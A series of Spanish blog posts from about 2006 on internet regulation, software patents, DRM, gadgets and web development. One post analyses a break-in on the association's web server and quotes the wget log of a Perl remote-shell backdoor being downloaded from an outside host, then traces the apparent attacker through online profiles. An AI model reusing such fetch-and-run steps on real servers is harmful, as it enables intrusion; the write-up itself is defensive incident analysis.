Y por ahora parece que el agua seguirá siendo mojada por muchos años más…

Los políticos deberían restringirse a sus funciones y limitarse a sus conocimientos (¿el mangoneo?). Al parecer Industria está preparando una nueva ley para “El Impulso de la Sociedad de la Información” (que debe tener mucho que ver con Industria).

Entre algunas novedades más o menos positivas (impulsar la firma electrónica, fomentar la industria de contenidos -¿mas $$ para la SGAE?- etc) van y meten esta burrada:

El Gobierno podrá impedir el acceso desde España a servicios o contenidos internacionales cuya interrupción o retirada haya decidido un órgano competente

¿Esto qué narices es? ¿qué órgano competente? ¿qué contenidos quieren filtrarse? (huele más que nada a P2P y a proteger la propiedad intelectual) ¿Vamos a retroceder al nivel de China, que bloquea el acceso a contenidos? Y cómo lo van a controlar, por que me juego todo a que los filtros se saltan con cualquier proxy de privacidad… ¿o también los van a filtrar? Los operadores deben estar temblando ante la idea de tener que montar mierda-firewalls para cumplir las estúpidas posibles órdenes de bloqueo.

Por favor, ruego que recapaciten y aprendan de una vez que lo que hace a Internet la herramienta de comunicación del futuro es precisamente la ubicuidad del acceso a contenidos, su desregularización y la libertad de expresión.

Anda que no somos frikis y 31337 que celebramos hoy el día de los blogs, por la fecha que es:

Increible pero cierto. Los dominios .es estuvieron caídos ayer durante 3 horas y media. Esto afecta no sólo a la navegación web sino a cualquier servicio, como el correo por ejemplo.

Parece increíble que esto pueda ocurrir y que los sistemas de reserva no funcionaran. Una caída de 3 horas en todos los servicios puede provocar muchísimas pérdidas en muchos sectores. Esperemos que de esta aprendan y se pongan las pilas.

El 17 de julio de 1997 pasó algo similar con los dominios .com, que estaban gestionados por NSI y un fallo técnico dejó al mundo sin Internet durante horas. Eso provocó la liberalización del sector y en la actualidad hay 13 servidores raíz (el máximo que permite el protocolo), seis de ellos distribuidos en varios continentes pese a parecer un único servidor virtual. El sistema se ha mostrado efectivo, y aguantó en octubre de 2002 el ataque de denegación de servicio más masivo y sofisticado de la historia contra los 13 servidores raíz durante una hora: 9 cayeron pero 4 se mantuvieron activos evitando el apagón digital. A ver si aprenden los de Nic.es.

Hace poco pensábamos que podríamos descansar por una temporada, tras decidir finalmente la Comisión Europea que el software no era patentable. A pesar del éxito todo el mundo tenía claro que era una pausa en una guerra mucho más larga, y que el tema de las patentes volvería a aflorar.

Pues bien, sin pasar siquiera 2 meses ya ha aparecido un nuevo proyecto, aún más ambicioso y pernicioso que el rechazado anteriormente, y el comisario de Mercado Interior de la UE se ha mostrado favorable a la propuesta del lobby pro-patentes. Lo denuncia y explica todo el fundador de la campaña No Software Patents. Parece que tocará volver a estar atentos.

Parece que poco ha durado la encriptación del protocolo usado por el proyecto Galileo (el GPS europeo), que pretendía limitar el acceso a los datos de los satélites de posicionamiento sólo a aquellos que abonaran la consiguiente tarifa.

Galileo, a diferencia del GPS, no es un proyecto financiado con fondos públicos, sino de un consorcio de empresas que espera recuperar la inversión, por lo que cobra licencias para cada cacharro que quiera utilizar el sistema. A diferencia del GPS, militar, su precisión no está limitada artificialmente y se garantiza incluso en tiempos de guerra, por lo que podrá ser utilizado en entornos críticos: Aterrizaje de aviones, entrada de buques en puertos, etc…

La gracia es que acaban de anunciar que la encriptación del protocolo ha sido rota, y con la información que proporcionan cualquier cacharro puede usar la señal de los satélites sin cánon ni leches.

Los investigadores reconocen que algunos pueden acusarles de cometer una ilegalidad, como cuando se rompe una protección del copyright de una canción, pero ellos defienden que no es comparable, que no pueden estar protegidos por copyright las emisiones de los satélites. Hacen una comparación con tratar de cobrar cánon por “mirar las luces emitidas por los faros y usarlas para posicionarse". Igual de absurdo, dicen, es cobrar cánon o considerar ilegal el “mirar de igual forma los satélites".

“Imagine someone builds a lighthouse,” argued Psiaki. “And I’ve gone by and see how often the light flashes and measured where the coordinates are. Can the owner charge me a licensing fee for looking at the light? … No. How is looking at the Galileo satellite any different?”

UTF es un formato de codificación de caracteres, el llamado “Unicode", que pretende lograr que se use un único juego de caracteres para todos los lenguajes.

El juego de caracteres es lo que relaciona un número con un carácter, una letra, que se pintará en pantalla. Los documentos de texto no son sino ristras de números que se interpretan después como letras.

El primero utilizado fue ASCII que utilizaba 7 bits para cada número, es decir, tenía 127 posibles letras. Eso sólo daba para las letras inglesas, nada de acentos ni cosas raras. Por ello pronto se empezó a utilizar 1 byte (8 bits) por cada número que representa una letra, y aparecieron infinidad de códigos ISO que asocian cada número de los 255 posibles a un carácter (Por ejemplo el europeo occidental es el ISO-8859-15). Dependiendo del código ISO, un mismo número puede ser interpretado de dos formas distintas, por lo que una “á” en un documento con nuestro juego de caracteres puede convertirse en otra cosa si se lee el mismo documento con otro juego de caracteres.

Para solucionar este desaguisado, y evitar los problemas de los distintos juegos de caracteres apareció UTF, que trata que todos los lenguajes usen el mismo juego de caracteres. El más popular es el UTF-8, que usa sólo 1 byte para la mayoría de las letras estándar (ASCII y símbolos básicos) y más cuando se requiere algún caracter extendido.

Pues mientras programaba una aplicación web que utiliza todo el tiempo UTF-8 (¿su nombre es chino? 你最关心的是什么 ¡No hay problema!) descubro que los emails enviados a Hotmail y Yahoo no se muestran correctamente. El webmail de esos dos servicios es tan sumamente cutre que no utiliza UTF-8 como formato de codificación de las páginas web, y ni siquiera convierte los mensajes entrantes al código que usa la página.

Al final me toca utilizar un apaño, y convertir con iconv los emails que envío a ISO si el email de destino es hotmail/yahoo, pero no puede menos que indignarme que unos de los servicios de correo más utilizados puedan ser tan cutres a estas alturas como para no soportar todavía Unicode. Por supuesto añado una nota a los mensajes, advirtiendo al usuario que algunos caracteres internacionales puede que los vea mal por que usa un servicio de correo muy lamentable.

¿Y tú, aún no te has convertido a Gmail?

La enooorme diferencia es que esta vez Google Earth también está disponible para linux, y de forma nativa, no como el picasa, que también está disponible, pero utilizando las librerías de emulación de windows de wine. Así da gusto. ¿Que liberaran el código sería pedir demasiado? :)

A disfrutarlo!

La fotografía digital es un sector brutalmente competitivo. En el paso del mundo analógico al digital han muerto muchas grandes empresas incapaces de adaptarse al cambiante mundo. Canon y Nikon han sabido aguantar el tirón, pero aún así sólo se han mantenido fuertes e inalcanzables en el sector profesional, con las cámaras SLR (Single-Lents Reflex). En el mercado de consumo la competencia de las grandes marcas de electrónica ha sido tan fuerte que no hay un líder claro.

Ahora toca el turno de la batalla en el sector de las Reflex digitales, tras la compra de Minolta por parte de Sony.

Veamos como queda el sector:

Canon: es sin duda la más fuerte del sector, la primera en llegar, enternder el mundo digital y ofrecer cámaras profesionales digitales. Es prácticamente la única elección en reflex full-frame (sensor enorme, del mismo tamaño de un negativo tradicional), y ofrece cámaras excelentes desde las de gama baja (350D) a la alta (1DsMarkII) , pasando por muy interesantes en la gama media (30D, 5D Full-frame…).

La principal diferencia es que invierte en sensores de tecnología propia, que la distinguen del resto, y en mi opinión son los que mejor calidad proporcionan. Suelen ser de tecnología CMOS en vez de CCD, consumen menos, tienen más sensibilidad y tienen menos ruido en las imágenes capturadas.

La mayoría de los profesionales que se han convertido a digital lo han hecho a Canon, y por lo tanto tienen lentes y complementes que les unen bastante a la marca.

Nikon: Llegó algo tarde, perdiendo su posición de dominio en el sector de la fotografía tradicional. A pesar de ello ha sabido reaccionar, y ahora ofrece cámaras excelentes en la gama baja (D50, D70s), media (D200) y hasta gama semi-profesional (D2Xs).

No siempre invierte en sensores propios, aunque ha logrado tener sensores buenos. Por lo que realmente brilla es por sus cámaras: rápidas, robustas, llenas de características y opciones configurables. Tiene los mejores sistemas autofocus y medición de luz.

Su situación es buena, pero no tiene una base de usuarios tan amplia, y puede verse en problemas frente a la competencia si no logra diferenciarse también por sus sensores.

Sony: Entra fuerte en el mercado ofreciendo una cámara SLR en la gama baja, de entrada, pero que lo tiene todo para convertirse en un bombazo. La Sony α DSLR A100:

• 10,2 Mpixels. Se rumorea que similar a la D200 de Nikon
• ISO 1600, razonablemente usable
• Estabilizador de imagen en la propia cámara. Como si todos los objetivos tuvieran estabilizador, pero sin su precio
• Una buena gama de objetivos, incluyendo algunos de la prestigiosa marca Carl Zeiss que tienen una pinta estupenda.
• Buen cuerpo: Disparo rápido, pantalla 2.5″ de buena resolución, autofocus 9 puntos, medición de luz matricial, activación de autofocus detectando el ojo en el visor, visor con prisma de buena calidad.

Otras: Las Sigma, Olympus, Pentax, etc. quedan muy tocadas. Ofrecen cámaras DSLR para amateurs, pero su precio suele ser algo superior a los modelos de entrada de Canon y Nikon. Para distinguirse buscaban diferenciarse en el uso de sensores especiales como Sigma, el estándar 4/3″ para compartir objetivos, filtros anti-polvo, pantallas grandes… Todo eso ahora lo ofrece Sony, a un precio muy competitivo y con una gama de objetivos superior al estándar 4/3″ que lleva mucho más tiempo en el mercado. Habrá que ver por qué camino optan para enfrentarse a la competencia, o si acaban sucumbiendo como tantas otras marcas.

Todo apunta a que la nueva cámara de Sony, con un precio de 999$, se convertirá en un duro competidor de las cámaras de gama baja, las “entry level", la Canon 350D y la Nikon D70.

Esperemos a los primeros análisis para confirmar si la calidad del sensor es comparable a la Nikon D200 y su sistema de autofocus/medición de luz son buenos, y sabremos si tenemos una nueva reina entre las cámaras reflex para amateur.

Se rumorea que para el Photokina 2006, en septiembre, Sony presentará su modelo superior, para luchar contra las hermanas grandes de Canon y Nikon. También es previsible que estas dos marcas traten de demostrar que pueden responder a Sony, y seguramente veamos muchas novedades y avances en cámaras tanto en el nivel básico como en el avanzado. Canon ha quedado bastante atrasada con su 350D, lanzada hace un año y medio, lo que ya es una eternidad en el mundo de la fotografía digital, y los modelos D50 y D70s con sólo un año, son realmente actualizaciones de la D70 que fue lanzada hace 2 años y medio, por lo que se esperan nuevos modelos que serán algo más que actualizaciones.

Esta maravillosa noticia acaba de llegar a nuestros oídos. La Comisión europea ha decidido que el Software no es patentable.

Es realmente extraño, y como comentan en ZDNet ha sorprendido a los grupos antipatentes, ya que la comisión siempre se ha mostrado fuerte defensora de las patentes, incluso jugando sucio y proponiendo al parlamento votaciones sobre el tema en reuniones de pesca.

Ahora parece que la Comisión por fin acepta los “noes” dados por el parlamento en varias ocasiones (probablemente porque la aprobación de las patentes comunitarias urge y no merece la pena seguir retrasando el acuerdo por las patentes de software), y ha dicho:

“The EPO (European Patent Office) would…apply and be bound by a new unitary Community law with respect to Community patents,” […] “The draft Community Patent regulation confirms in its Article 28.1(a) that patents granted for a subject matter (such as computer programs), which is excluded from patentability pursuant to Article 52 EPC, may be invalidated in a relevant court proceeding.”

De momento las patentes de software podrían ser invalidadas en un juicio, pero lo que habría que conseguir es que puedan ser recurridas sin incurrir en costosos procesos legales, simplemente alegando que se trata de una patente de software ante el EPO.

Estaremos atentos a ver como se desarrolla finalmente.

Hoy es el día de Internet, y me ha sorprendido un poco que, por ejemplo, nuestra Escuela haya dejado pasar esta celebración sin organizar absolutamente nada.

Tampoco es que haya muchos eventos reseñables (o no me lo parecen a mi). La mayor parte son un cúmulo de pequeñas actuaciones de diferentes organismos e instituciones. Red.es comenta alguna de las actividades que organiza. Los periódicos repasan un poco las cifras, penetración de mercado, lineas ADSL y demás, y repasan las actividades de los distintos organismos. Supongo que en las televisiones también se le estará dando cobertura.

La iniciativa, en mi opinión, más interesante es el fotoblog “Tu pueblo en Internet” que pretende promover la publicación de fotos antiguas, para que no se pierda la memoria histórica y costumbrista de tantos y tantos rincones de España, que difícilmente encuentran hueco en la red.

Muy útil me parece también el anuncio del PSOE de unirse a FON para dar acceso wi-fi gratuito a Internet desde los alrededores sus sedes. Pero me temo que yo seguiré sin pillar conexiones inalámbricas en casa y esperando eternamente que el proveedor de ADSL se digne a ponerme la línea, que ya llevamos más de 2 meses (y si esto es para darse de alta y pagarles, no quiero ni pensar como lo puedo pasar para darme de baja). En fin…

Este martes San y yo fuimos a comprar un reproductor MP3. Queríamos uno de los de disco duro y batería, con entre 20 y 30 gigas de capacidad… Antes de tomar la decisión, como no, me empapé hasta las cejas de especificaciones, características y demás de diferentes marcas y modelos, para tomar una decisión (espero) acertada.

Por si alguno está buscando también reproductor mp3 y necesita una guía de compra, os comento los modelos que estaba barajando:

• Apple Ipod (299€): Es el más clásico ya, y tiene excelentes características y un precio razonable (con el brutal nivel de ventas que tienen, pueden mantener unos precios ajustados). Fastidia muchísimo sin embargo los precios en Europa, de 300€ para el modelo de 30 Gb, frente a los 300$ (236€ al cambio) que cuesta en EEUU.
  • Ventajas: 30Gb, ¡Ligerísimo! 136gr, 14h de batería, diseño espectacular.
  • Inconvenientes: Bastante propietario, muy ligado a iTunes, no soporta ogg.
  • Ni fú ni fa: excelente pantalla 2.5″ (no es lo que más me importa de un mp3)
• CREATIVE ZEN Sleek 20 Gb (~210€): Majo, aunque algo caro para ser sólo de 20Gb.
  • Ventajas: batería 19h, peso 157gr.
  • Inconvenientes: Algo caro para 20Gb, no soporta ogg, la pantalla no me gustó mucho y casi no se encuentra.
  • Ni fú ni fa: Radio FM, Graba.
• Archos Gmini XS 202 Mp3 (~230€): Bastante majo, no tiene un diseño tan bonito como otros, pero tiene un precio razonable y buenas características.
  • Ventajas: batería 17h, peso 120gr.
  • Inconvenientes: Algo caro para 20Gb, no soporta ogg.
• Sony NW-HD5: (~235€) Un reproductor excelente, que no he vuelto a encontrar en tiendas a precios razonables. Sony lo ha sustituido inexplicablemente por uno a mi juicio peor, mucho más pesado, más grande, más caro, menos batería… el NW-A3000 que eso sí, tiene un diseño más “cool".
  • Ventajas: Batería 40h!!!, peso 110gr!!!, diseño chulo.
  • Inconvenientes: Algo caro para 20Gb, no soporta ogg sino un formato chungo de Sony (y el mp3, claro).

Otros modelos menos interesantes: Samsung y Phillips tienen modelos muy majos (YH-925, HDD120, HDD6320), pero algo caros comparados incluso con el referente en el sector Apple (no se entiende como pretender competir con precios más caros). Acer MP-330 de 20 Gb: Barato pero resulta muy basto y pesado. Commodore Evic 20 Music Box: Barato pero grande y pinta muy plasticosa y frágil.

Como habéis visto he citado varias veces como inconveniente el que la mayoría de los reproductores no soportan el excelente formato libre ogg, lo cual es un gran inconveniente para mí pues parte de mi colección está en ese formato. Uno de las pocas marcas que lo soportan es Cowon, con su serie de reproductores iAudio. Sin embargo los reproductores de esa marca que llegan a España suelen tener unos precios elevados, que no compensan el soporte de ese formato.

Pero resulta que en la Fnac están vendiendo el modelo M3, ya descatalogado pero que sigue siendo muy majo, por tan sólo 189€. Así que sin más, os presento nuestro nuevo y flamante reproductor MP3:

• iAUDIO M3: (189€) Elegante diseño, con la pantalla y controles en el cable de los auriculares para guardar a buen recaudo el reproductor y no dar el canteo sacando el Ipod ante ojos golosos, tiene una excelente calidad de sonido y soporta Ogg.
  • Ventajas: Soporta ogg, 136gr, 20Gb, pantalla y controles en los auriculares.
  • Inconvenientes: La pantalla puede resultar demasiado pequeña, batería 14h (el modelo M3L tiene 35h, pero sale bastante más caro y no estaba en la Fnac)
  • Ni fú ni fa: Radio FM, Graba, los controles pueden resultar algo complicados al principio, pero te acostumbras.

PD: Otra ventaja es el nombre del modelo… mmmm… M3… ¿os recuerda algún cochazo?

Así se titula este desternillante artículo que me ha pasado Lu…

Entre las perlas que suelta, destaco:

They [uropean and Chinese hackers] hate our lead in computing technology and will stop at nothing until they have control of all of our computers.
I’m talking about a project called ‘Linux‘, something you may not have encountered, but might do some day. It’s a computer program that was initially developed in Finland as a means of circumventing valuable copyrights and patents owned by an American company called SCO Group.
[…]
Indeed, Linux is so pervasive amongst the blue states and many liberal universities that a leading computer expert Steve Balmer (from Microsoft) described Linux as cancer.
[…]
A generation of computer users might get use to accepting foreign software hand-outs rather than paying for a superior American products. If only the danger were just to our economy:

These days computers control everything from TV stations to battleships; Our crucial information and defense infrastructure is built on computer technology. If we allow this cancer into our networks, there is no knowing what the effect might be on our infrastructure, but that is just what liberals are trying to do.
[…]
And guess what software Osama Bin Laden uses on his laptop?

If you guessed it was Linux you would be 100% right. Osama uses Linux because he knows designed to counterfit DVDs, curcumventing the Digital Millenium Copyright Act, and defraud companies like Disney.
[…]
If one of your friends is using Linux or may be tempted to try it show them this article. Explain that Linux is a genuine threat and that by using it they may be opening their computer to Chinese hackers.
[…]
Finally, remember to include Linux users in your prayers tonight. As individuals we may not be able to change people’s minds, but the Bible teaches that God can make any sinner repent.

No acabamos de decidir si toda la web va de coña, o realmente puede haber gente tan, tan pirada. Tiene auténticas paridas como esta otra: European / Liberal / Gays = Fastrack to HELL, pero es que la gente les contesta en plan serio, mientras yo ya tengo que luchar por controlar mis carcajadas, que, leches, estoy en el curro… XDDD

C.R.A.P. (mierda, gilipollez) es el acrónimo propuesto recientemente para denominar a los sistemas de protección de los derechos de autor de obras digitales (Digital Rights Management o DRM):

• Content
• Restriction
• Annulment
• Protection

En un mundo digital las cosas se pueden copiar sin que se pierda calidad en el proceso: un 0 seguirá siendo un 0 y un 1 un 1. Eso sumado a las cada vez mas rápidas redes de comunicaciones, los ordenadores más potentes y enormes discos duros disponibles hacen tremendamente fácil la copia de contenidos a lo largo de todo el mundo. A las industrias centradas en el obsoleto modelo de negocio de la venta de contenidos en soportes físicos a precio de oro se les acaba el chollo como a los aguadores cuando empezaban a llegar cañerías a las casa. Para luchar contra esto, en vez de cambiar, están continuamente ideando nuevas técnicas para complicar las cosas.

Sin embargo lo que consiguen estas técnicas es más bien poco. Los piratas, que se enriquecen revendiendo el contenido una vez desprotegido, no tienen muchos problemas para evitar las protecciones. Sin embargo muchos usuarios lícitos ven limitadas las posibilidades de aquello que compran, o incluso perjudicados: CDs que no funcionan en algunos dispositivos, programas que se instalan sin consentimiento y amenazan la seguridad de tu PC, caros videos de alta definición que se muestran a baja calidad por que no dispones de los elementos de seguridad adecuados, etc.

El otro frente de la lucha de estas poderosas corporaciones se centra en el plano legal. Presionan ($$$) a políticos tan fuerte, que tanto en EEUU como en Europa se están adoptando leyes que prevén penas mayores para casos de piratería que incluso para robos con violencia. Ayer la Comisión Europea proponía penas de hasta 4 años de cárcel. Los derechos por otro lado se recortan a placer, para que cada vez mas cosas caigan en el saco de lo “ilegal". Todo sea con tal de preservar el derecho de unos pocos de hacer un negociazo, aunque se trate de cultura, todo está en venta y es carne de mercado…

Un informe de la Electronic Frontier Foundation (EFF) titulado Unintended Consequences: Seven Years Under the DMCA (La Digital Millenium Copyright Act es la ley para la protección del copyright en EEUU) citaba como efectos colaterales de la ley (entre otros):

• Obstaculización de la libertad de expresión y la investigación científica.
• Restringir el uso legal y justo de los bienes adquiridos por los usuarios.
• Dificultar y obstaculizar la competencia y la innovación

Tanto es así, que hasta los políticos caen en su propia trampa, incumpliendo sus restrictivas y abusivas leyes. Por ejemplo según la RIAA (Recording Industry Association of America), es ilegal ripear un CD para convertirlo a MP3 y poderlo escuchar en tu reproductor portátil. En un video donde aparece Bush con su Ipod (todo con tal de dar imagen modelna) se adivinan canciones de los Beatles, que no se ofrecen para descargar de la tienda de música de Apple, por lo que sólo pueden provenir de un CD ripeado, o peor, bajado criminalmente de Internet :P.

Seguro que en este caso la RIAA hará una excepción, y no presentará cargos contra Bush, pero que se ande con ojo, que la SGAE es capaz de cobrar por música reproducida en conciertos de personas con discapacidades, bodas, etc. así que como se le ocurra ponerse a cantar Macarena de nuevo…

De nuevo ha pasado, han vuelto a entrar en el servidor web de la asociación, aunque esta vez los daños y problemas ocasionados han sido mínimos: El atacante no se pudo hacer root, y probablemente ni siquiera logró conectarse.

Es el problema que tiene el alojar un servidor web con tanto código de tanta gente, y tantos programas instalados. Parece que las pruebas apuntan a un blog no actualizado, aunque es difícil saberlo, ya que no han quedado logs.

Tras la llamada de Maria Luisa y Suso de esta mañana nos pusimos a investigar el asunto. El apache no respondía a peticiones y habían descubierto un proceso perl ejecutándose como usuario www-data, y conectado a un puerto raro (pero que para gran pesar del atacante, está filtrado por la escuela). El código en cuestión estaba en /tmp/coke.txt, y era un simple servidor telnet, para dar al atacante una consola remota.

En los logs de errores aparecía la siguiente salida de un wget:

--15:09:54--  http://www.vetorial.net/~matheuss/coke.txt
           => `coke.txt'
Resolving www.vetorial.net... 200.143.88.8
Connecting to www.vetorial.net|200.143.88.8|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,046 (11K) [text/plain]

	
    0K ……….                                            100%   17.59 KB/s
	
15:09:57 (17.59 KB/s) - `coke.txt’ saved [11046/11046]

En la web seguía estando disponible el script, y parecía ser del mismo atacante (lamentable error de pardillo), ya que el código incluía una password encriptada, sin indicar cuál era. No era una web de hacking ni un script de ejemplo con una password por defecto indicada en el código. Lo cual indica que el atacante tiene que saberla y la web es suya o tiene acceso a ella.

La web es de un proveedor de acceso a internet de Brasil, y el script tiene comentarios en portugués. Buscando por internet al tal Matheus se encuentra su perfil en otros sitios, relacionados con la temática de la página: Juegos RPC. Ups… tenemos su ICQ :))) Le he añadido a ver si se conecta y hablo con él. Va a ser divertido.

Lo más importante es encontrar por dónde entró para arreglar el fallo. Pero en los logs del apache no aparece la petición que baja el dichoso script y lo ejecuta. Parece como si el apache hubiera esperado a la finalización del script que ejecuta antes de loggear la petición, y como nunca acabó, se acabó tostando. Mirando las IPs que acceden algo antes sólo hay 2-3 de brasil, todas accediendo a un blog a raíz de búsquedas en Google Images, y de un proveedor de internet de Sau Paulo, lo mismo que dice el pavo en su perfil.

Seguiremos informando…

Algunas cosillas que se están moviendo estos días por Internet:

Bug del explorer
Uno de los gochos, sigue sin parchear, dejando vulnerables a millones de ordenadores y con exploits rondado por todo Internet. Pronto veremos nuevos DDOS me temo. Mientras Microsoft ha sido incapaz de sacar una corrección para el problema, han aparecido ya dos parches no oficiales de empresas de seguridad. Siguen lentos, lentos, lentos…

Prohibir para educar
Normal que vayan lentos después de leer esta entrevista a Ballmer de la que se mofan a placer en Slashdot. Las respuestas del CEO de Microsoft incluyen la siguiente:

–Do you have an iPod?
–No, I do not. Nor do my children. My children–in many dimensions they’re as poorly behaved as many other children, but at least on this dimension I’ve got my kids brainwashed: You don’t use Google, and you don’t use an iPod.

Si se siente orgulloso de lavar el cerebro a sus hijos para que no usen sistemas de la competencia, pura y llanamente por ser competencia, no por las cualidades técnicas que tengan, apaga y vámonos. Menuda “educación".

Apagón en la web
Pocos están al tanto, pero sólo quedan 60 días de plazo para que el Explorer siga aceptando como hasta ahora los contenidos multimedia embebidos, como Flash, applets, etc. Es el resultado colateral del sistema de patentes, que permitió a una empresa casi fantasma, Eolas, patentar el medio para embeber contenidos automáticamente en una página.

Los applets y objetos flash se verán desactivados, requiriendo un incómodo “click” del usuario para activarlos. Hay sin embargo absurdas soluciones para esquivar la patente, y que seguirán funcionando como hasta ahora: Que sea código javascript externo el que añada el contenido una vez cargada la página. Un estupendo ejemplo de hasta dónde puede llegar la estupidez de las patentes.

Las posibles soluciones son:

Opción A:
        // HTML File
        <html>
          <body leftmargin=0 topmargin=0 scroll=no>
            <script src="Embed.js"></script>
          </body>
        </html>

	
        // embed.js
        document.write(’<embed src="examplecontrol">’)
	
Opción B:
        // HTML File
        <html>
          <body>
            <div>
              <script src="embedControlOuterHTML.js"></script>
            </div>
          </body>
        </html>
	
        // embedControlOuterHTML.js
        embedControlLocation.outerHTML = ‘<embed src="examplecontrol">’;
	
Opción C:
        // HTML File
        <html>
          <body>
            <div id="DivID">
              <script src="createElementExplicit.js"></script>
          </body>
        </html>
	
        // createElementExplicit.js
        var myObject = document.createElement(’object’);
        DivID.appendChild(myObject);
        myObject.width = "200";
        myObject.height = "100";
        myObject.classid= "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6";
        myObject.URL = "example.wmv";
        myObject.uiMode = "none" ;
	
Opción D:
        // HTML File
        <html>
         <head>
           <script src="external_script.js" language="JScript"></script>
         </head>
	
         <body>
           <div id="EXAMPLE_DIV_ID">
              This text will be replaced by the control
           </div>
           <script language="JScript">
             CreateControl( "EXAMPLE_DIV_ID",
                            "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6",
                            "EXAMPLE_OBJECT_ID", "600", "400", "example.wmv",
                            "-1")
           </script>
         </body>
        </html>
	
        // external_script.js
        function CreateControl(DivID, CLSID, ObjectID,
                               WIDTH, HEIGHT, URL, AUTOSTART)
        {
          var d = document.getElementById(DivID);
          d.innerHTML =
            ‘<object classid=’ + CLSID + ‘ id=’ + ObjectID +
            ‘ width=’ + WIDTH + ‘ height=’ + HEIGHT +’>
            <param name="URL" value=’ + URL + ‘>
            <param name="autoStart" value=’ + AUTOSTART + ‘/>’;
        }

Quedan multitud de sitios por alterar para que sean compatibles con la nueva forma de insertar contenidos, entre los que se encuentra por supuesto la web de la escuela que será inusable con tanto flash que tiene cuando los explorer cambien el modo de funcionamiento. (Más información de los cambios en MSDN).

Nuevo estilo de Google
En ArsTechnica han descubierto el nuevo estilo que Google está testeando e información de cómo activarlo. Para mi gusto, mejora un montón :) yo ya lo estoy usando, y a ver cuando está disponible para el resto de búsquedas (imágenes,…) y no sólo para búsquedas en la web.

Rails 1.1
Antes de ayer salió la nueva versión de RubyOnRails, y ayer en la Escuela hubo una charla sobre esta plataforma de desarrollo web. Mantengo mi opinión sobre el framework: Muy chulo y práctico para aplicaciones sencillas, pero sigo con dudas de si su sencillez se podría mantener para aplicaciones enormes como ARFO.

A veces no me cuadran las cosas. Bill Gates, que es uno de los mayores filántropos de la humanidad por la pasta que tiene, a veces sorprende con exabruptos como este:

Sobre el portátil de 100 del MIT, el presidente de la mayor empresa de software del mundo señaló también que “si vas a hacer que la gente comparta un mismo ordenador, consiga una conexión de banda ancha y a alguien que ofrezca soporte técnico", lo mínimo que se puede hacer es “conseguir un ordenador decente en el que puedas leer el texto” sin tener que estar dándole a la manivela -el ordenador de bajo coste del MIT permite lograr energía para funcionar girando una palanca de forma reiterada-.

Extracto de noticia del El País

Después de oirle decir esto me queda claro que su esposa debe tener mucho que ver con su reciente vocación caritativa.

Lo peor de todo es la flagrante contradición en la que cae. Hace no mucho ofreció una versión de windows gratis para este dispositivo que se estaba diseñando, y le dijeron que no sólo se buscaban cosas de bajo precio, sino también la libertad que le puede dar un sistema operativo libre, como por ejemplo linux. ¿En aquel momento el portatil de 100 US$ del MIT no era mala idea?

La ridicularización de la manivela con la que se pueden recargar las baterías del portátil es de lo más grave. Para Gates cuál sería el dispositivo ideal… ¿Origami? Veamos sus características:

• Sin teclado: Ideal para el trabajo, redactar documentos, etc…
• Autonomía de 3 horas: Cada 3 horitas te toca andar hasta el puesto de socorro que a lo mejor tiene encendido el generador.
• Pantalla TFT: Sólo necesitas encontrar una buena sombra para disfrutar de sus trillones de colores y bonitos degradados de azulito
• Siempre conectado: Eso, orientación a la red, para cuando los niños pobres vayan al StarBucks puedan conectarse a la wifi para leer su e-mail, por no hablar de poder intercambiar fotitos con sus teléfonos con Bluetooth de última generación, ¡que chachiii!. Los deberes serían: boys&girls, a ver quien postea a la web o a su blog la photo más cool de una jirafa.
• Seguridad: ¡En cuanto instalen el service pack 3, de 65 megas estarán seguros en sus conexiones a internet!
• Con punterito: Seguro que no se pierda nada… y si se pierde, ¡te compras otro y listo!
• Con disco duro: Ideal para llevar dando tumbos en una cartera corriendo por el campo. ¡Si se jode te compras otro y listo!
• ¡Barato!: Sólo entre 599 y 99 euros…

Debería criticar menos y dejar trabajar a los que diseñan el portátil de los 100 US$ en el MIT, que saben a quién va dirigido exactamente el producto y sus necesidades reales, con manivela incluida.

Esta noticia demuestra que no es necesario tener ni puñetera idea de un tema para escribir sobre él. Es más, si no tienes ni idea pero adoptas un tono catastrofista, al estilo guión de peli americana, encima consigues un gran impacto en los lectores.

Los mejores fragmentos:

Una etiqueta contiene una información digital que es interpretada por un lector. Pero, ¿qué ocurre si alguien modifica una etiqueta RFID con malas intenciones? Esta posibilidad, totalmente factible tal y como está especificado el sistema en la actualidad, permitiría, según los investigadores, introducir cualquier código en las etiquetas. Y quien dice código, dice virus.

El ejemplo más suave es el de un hipermercado. Un comprador con malas intenciones llega al súper con un producto etiquetado por él -la tecnología para crear RFID estará al alcance de cualquiera- y que contiene, junto a los datos usuales, un virus. Pasa directamente por caja simulando la compra, el lector registra su código y éste entra sin problemas en la base de datos del comercio, infectándola. A partir de ahí, no es descabellado pensar en que el atacante podría llegar a modificar los precios de los productos.

Otro ejemplo, aún peor: el sistema de gestión de maletas (handling) de un aeropuerto. Una maleta con una etiqueta que contenga el virus pasa por un lector que intenta determinar a dónde debe dirigirla. En ese momento el virus entra en el sistema y lo colapsa, o lo manipula con fines aún peores, como el de que los controles de seguridad ignoren ciertas maletas.

No citan el informe original, pero supongo que si los que lo escribieron eran medianamente expertos, más bien comentaban sobre los temores de invasión de la privacidad que puede suponer RFID, por el seguimiento que se pueden hacer de los chips: Saber qué compras escaneando tu basura, tus movimientos leyendo el RFID del abono de transportes, etc.

Update: El estudio es éste, y en efecto plantea las posibilidades de ataque contra un supermercado o un aeropuerto, no es inventiva del periodista. La causa es simplemente los problemas de SQL Injecting que se pueden dar si se hacen malas aplicaciones o se esperan ciertas condiciones en los datos

Me sigue pareciendo todo un tanto exagerado, el SQL injecting lleva mucho tiempo en la web, y no ha sido un problema en gran escala como lo plantean. Los cajeros de los supermercados y sistemas de maletas seguro que están bien programados, y sus permisos de acceso a la base de datos estarán correctamente restringidos, a lectura en algunas tablas e inserción en otras.

El extendidísimo flash en las páginas web, así como multitud de otras extensiones pueden ver comprometido su futuro, en lo que puede ser un punto de inflexión importante para la web.

Los que sigáis atentos los devenires de las patentes de software sabréis de sobra el caso de la patente de Eolas, una pequeña empresa estadounidense, sobre “cargar automáticamente componentes embebidos en una página web". Microsoft se vio obligado a pagar 560 millones de dólares por infringir semejante estupidez de patente, y ahora ha modificado el navegador Explorer, para que los dichosos componentes, como flash u otros no carguen automáticamente, sino tras un “click” del usuario.

Este caso sirve para demostrar la estupidez absoluta que suponen las patentes de software, y el peligro para la innovación que suponen si se aprueban también en Europa.

